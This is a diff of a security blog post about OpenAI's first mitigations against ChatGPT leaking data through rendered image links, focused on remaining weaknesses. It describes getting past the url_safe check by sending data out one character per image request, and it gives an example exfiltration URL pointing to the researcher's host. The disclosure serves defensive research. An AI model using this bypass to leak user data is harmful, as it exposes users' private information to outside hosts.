wunderwuzzi23/blog/content/posts/2023/openai-data-exfiltration-first-mitigations-implemented.md

 Having a central validation API hopefully also means that Enterprises customers will be able configure this setting to further increase the security posture of ChatGPT for their environments.

-## Not a perfect fix - Remaining Concerns
+## Not a Perfect Fix - Remaining Concerns

 As stated, it's not a perfect fix.

+###  Still Allows Leaks

-It is still renders requests to arbitrary domains at times, and it can be used to send data out.
+It is still renders requests to arbitrary domains at times, and hence can be used to send data out.
 Obvious trickeries like splitting text into individual characters and creating a request per character for instance showed some (limited) success at a first glance.
 It only leaks small amounts this way, is slow and more noticable to a user and also to OpenAI if logs of the `url_safe` API are reviewed and monitored.

 To give an example out of 36 characters (a-z 0-9) I got nine of them rendered via unique URLs.
 So for instance this URLs exfiltrates (and also renders) the letter `a` and passed the check: `/url_safe?url=https://wuzzi.net/img/a.png`